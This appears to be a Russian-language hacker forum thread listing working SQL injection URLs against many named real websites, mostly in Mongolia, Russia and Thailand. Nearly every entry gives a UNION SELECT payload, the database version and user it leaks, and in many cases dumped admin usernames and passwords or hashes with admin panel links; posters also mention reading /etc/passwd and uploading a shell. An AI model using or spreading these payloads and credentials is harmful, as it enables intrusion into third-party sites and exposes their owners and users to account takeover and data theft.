Нет не слепая там скуля. Вывод есть. Скуля самая обычная -1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://www.wustyle.com/ch/new/article.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()), 4,5,6,7 wustyle_com:wustyle@localhost:4.1.22-standard
Powered by DzCMS Code: http://www.monvector.mn/index.php?mcmodule=news&newsid=3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14+limit+1,1/* version():5.0.33 database():mnvector user():root@localhost Code: http://www.monvector.mn/index.php?mcmodule=news&newsid=3+union+select+1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9,10,11,12,13,14+from+user+limit+1,1/* admin:dashkaa Code: http://www.monvector.mn/admin/login.php ___ Powered by DzCMS Code: http://www.tuushin.mn/index.php?do=news&newsid=3+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15+from+user+limit+1,1/* version()5.0.33 database():tuushin user():root@localhost Code: http://www.tuushin.mn/index.php?do=news&newsid=3+union+select+1,2,3,4,concat_ws(0x3a,loginname,password),6,7,8,9,10,11,12,13,14,15+from+user+limit+1,1/* admin:dashkaa Code: http://www.tuushin.mn/admin/login.php ___ Powered by DzCMS Code: http://www.uurkhai.mn/index.php?mcmodule=news&newsid=72+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19 version()5.0.75-community-log database():uurkhaim_uurkhai user():uurkhaim_admin@localhost Code: http://www.uurkhai.mn/index.php?mcmodule=news&newsid=72+union+select+1,2,3,4,concat_ws(0x3a,userid,loginname,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user sony:toshiba Code: http://www.uurkhai.mn/admin/login.php ___ Powered by DzCMS Code: http://www.powergym.mn/index.php?mcmodule=news&newsid=588+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+limit+1,1 version():5.0.75-community-log database():uukhaine_powergym user():uukhaine_undes@localhost Code: http://www.powergym.mn/index.php?mcmodule=news&newsid=588+union+select+1,2,concat_ws(0x3a,loginname,password),4,5,6,7,8,9,10,11,12+from+user+limit+1,1 admin:123456 Code: http://www.powergym.mn/admin/login.php ___ Powered by DzCMS Code: http://www.onlinezar.mn/index.php?mcmodule=news&newsid=59+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+from+user+limit+1,1 version():5.0.75-community-log database():uukhaine_onlinezar user():uukhaine_undes@localhost Code: http://www.onlinezar.mn/index.php?mcmodule=news&newsid=59+union+select+1,2,concat_ws(0x3a,loginname,password),4,5,6,7,8,9,10,11,12+from+user+limit+1,1 admin:mmc Code: http://www.onlinezar.mn/admin/login.php ___ Powered by DzCMS Code: http://www.uils.mn/index.php?info=newsfull&newsid=134+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10+limit+1,1/* version():4.1.20-log database():uilsmn user():[email protected] Code: http://www.uils.mn/index.php?info=newsfull&newsid=134+union+select+1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9,10+from+user+limit+1,1/* d.admin:admin Code: http://www.uils.mn/admin/login.php ___ Powered by DzCMS Code: http://www.ecoedu.mn/index.php?mcmodule=news&newsid=850+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+limit+1,1/* version():4.1.20-max-log database():ecoedu user():[email protected] Code: http://www.ecoedu.mn/index.php?mcmodule=news&newsid=850+union+select+1,2,concat_ws(0x3a,loginname,password),4,5,6,7,8,9,10,11,12+from+user+limit+1,1/* admin:admin Code: http://www.ecoedu.mn/admin/login.php ___ Powered by DzCMS Code: http://www.mon-ensemble.mn/index.php?mcmodule=cat_pages&catcode=7+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user/* version():4.1.20-log database():eiti user():[email protected] Code: http://www.mon-ensemble.mn/index.php?mcmodule=cat_pages&catcode=7+union+select+1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user/* admin:admin Code: http://www.mon-ensemble.mn/admin/login.php ___ Code: http://sflc.num.edu.mn/index.php?newsid=zuwlul&contentid=7+union+select+1,2,concat_ws(0x3a,version(),database(),user())/* version()():5.0.45 database():sflc_db user():sflcdbuser@localhost Code: http://sflc.num.edu.mn/index.php?newsid=zuwlul&contentid=7+union+select+1,2,concat(table_name,0x3a,column_name)+from+information_schema.columns/*
<<Доска бесплатных объявлений>> Code: http://www.board.reporter-studio.ru/idv.php?id=-55886'+union+select+1,2,3,4,5,6,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--+ 5.0.22-=*=-board_-=*=-admin@localhost-=*=-redhat-linux-gnu robots.txt Code: #robots.txt for http://www.board.reporter-studio.ru user-agent: * disallow: /admin/ disallow: /connect.php disallow: /banners.php Host: www.board.reporter-studio.ru tables where: +like+'password'--+ Code: http://www.board.reporter-studio.ru/idv.php?id=-55886'+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+information_schema.columns++where+column_name+like+0x70617373776f7264+limit+7,1--+ table: admin db: publications_ log: admin pass: 374982 load_file('/etc/passwd')
Скуля на http://www.radio-shalom.ca Уязвимый скрипт. http://www.radio-shalom.ca/showemission.php?ID=1015 Список пользователей и их паролей. http://www.radio-shalom.ca/showemission.php?ID=1015+and+0+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,pass),11,12,13,14+from+alex_livre_users_en+limit+0,1+--+ Database Version: 5.0.45 Database name: Main User name: [email protected] Datadir: /data/mysqld1/ OS: redhat-linux-gnu
<<СПРАВОЧНИК БИЗНЕС-ИНФО, КАЗАХСТАН.>> Code: http://www.1kz.biz/index.php?city=&cat=2&id=-20+union+select+1,2,3,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3--+ 5.0.67-community-log-=*=-slvn_1kz-=*=-slvn_1kzbiz83@localhost-=*=-redhat-linux-gnu
www.democracymeansyou.com Code: http://www.democracymeansyou.com/articles/articlepf.php?ID=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- version():4.0.18-standard database():dmy_db1 user():kleinfei@localhost
<<Работа в Киеве>> Code: http://www.ukrwork.net/pers_rezume.php?id=-3510+union+select+1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6-- Code: http://www.ukrwork.net/admin/login.php?accesscheck=%2Fadmin%2Findex.php В админке моно слить и редоктировать всех пользователей.... 5.0.51a-=*=-279_ukrworknet-=*=-adminukrwork_279@localhost-=*=-portbld-freebsd7.0 concat_ws(0x3a,login,pazzword) from users +limit+620,1 -=admin=- log: admin pass: qp173y
Code: http://kapelan68.net/k.php?actionn=komentarz&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4 kapelan@localhost:kapelan:5.0.45-Debian_1ubuntu3.3-log 5.0.45-Debian_1ubuntu3.3-log впервые такую версию вижу Code: http://www.musiklexikon.net/komponisten/k.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 musiklexikon@localhost:musiklexikon:5.0.45
Code: http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,version(),database(),user()),3 version():5.0.75-1 database():web22_db1 user():web22_u1@localhost Code: http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,id,login,pass),3+from+moderator 1:Andrey:0025308 2:Tarantul:htlfrnjh
1) Code: http://lisbon.pessoa.free.fr/places.php?id=-67+union+select+1,2,3,4,5-- version():5.0.67 database():lisbon_pessoa user():[email protected] 2) Code: http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,2,3,4-- version():5.1.31 database():ciudadredonda user():ciudadredonda@localhost Code: http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,table_name,3,4+from+information_schema.tables-- Code: http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,concat(0x3a,login,password),3,4+from+members-- admin312PQ/H/U6AVM demodevFxxVFZsuos
Code: http://www.uddannelsesnetvaerket.dk/events.php?mode=view&iEventID=228+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11+limit+1,1/* version():5.0.27 database():uddnet user():uddnet@localhost
http://www.ccls.org/event.php?d=20090412&eventID=-4662+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,version(),78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130-- 4.1.22-standard
Database Version: 4.1.22-max-log Database name: nfcadmin User name: [email protected] Database Version: 5.0.32-Debian_7etch8-log Database name: everydaydish User name: root@localhost FILE_PRIV: Y Login: root Pass: *B747F2732BA6BOC2DD69A76241F18DAF52CA3777 (мб ошибся) Админка: http://www.everydaydish.tv/admin Database Version: 5.0.51a-community-log Database name: myawol User name: [email protected] Вытаскивать из members
Code: http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/* version():5.0.45-log database():Bangkoksurgery user():Bangkoksurgery@localhost Code: http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7+from+phpbb_users/* admin:21232f297a57a5a743894a0e4a801fc3=admin Code: http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat(0x3a,user,0x3a,pass),5,6,7+from+admin_db/* admin:admin
http://www.hockeydb.com PR=6 http://www.hockeydb.com/ihdb/stats/pdisplay.php?pid=-62240+union+Select+user(),2,3,4/* Database Version: 5.0.45-log Database name: slater_slater User name: slater_r@localhost есть таблица vb.users хеши все соленые!
cargotrend.co.th Google PageRank 3 chttp://www.cargotrend.co.th/webboard/question.php?gid=-115 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(username,0x7873716C696E6A64656C,passwd,0x7873716C696E6A64656C,update_date) FROM cargotrend_data.useradmin LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71),6,7,8,9/* bweagle:a9071fbe0379ea38bd6684c48de6e9f4:2009-03-13 17:28:21 bweagle:flyhigh http://www.cargotrend.co.th/admin/login.php Радует статистика по сайту http://www.cargotrend.co.th/stat/ Шелл можно закинуть Вдогонку, желающим поковыряться http://www.greenlandcity.com/webboard/question.php?gid=-107+union+select+1,2,3,4,5,version(),7,8-- PR 1 http://www.job2way.com/webboard/question.php?gid=-394+union+select+1,2,3,4,version(),6,7-- PR 3 http://www.ningfashion.com/webboard/question.php?gid=-214+union+select+1,2,3,4,5,version(),7,8-- PR 1 Везьде 4.1.22-standard
Hoster IVR,Voice,Broadcasting,Phone,Numbers,Call Routing | Ifbyphone 5ая ветка user() = [email protected] Ново-Курьинская вода Code: voda:[email protected]:5.0.41-log Code: admin:5d436cf40fad3f2e админка http://voda.ur.ru/admin.php Сеть по лечению целюлита и оздоровления организма 5ая ветка Code: user() = proinfo@localhost database() = proinfo_cellulait
6koles.ru тИЦ :450 HTML: http://6koles.ru/shini_search_result.php?mode=size&season=0&width=30&height=1&radius=13&company=6+UnIoN+select+concat_ws(0x3A,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+&class14=on user6koles1@localhost:5.0.24-standard:db_user6koles1
продолжим ламать шины ТИЦ: 400 PR: 4 http://www.koleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6, 7/* koleso@localhost:5.0.45-log:koleso
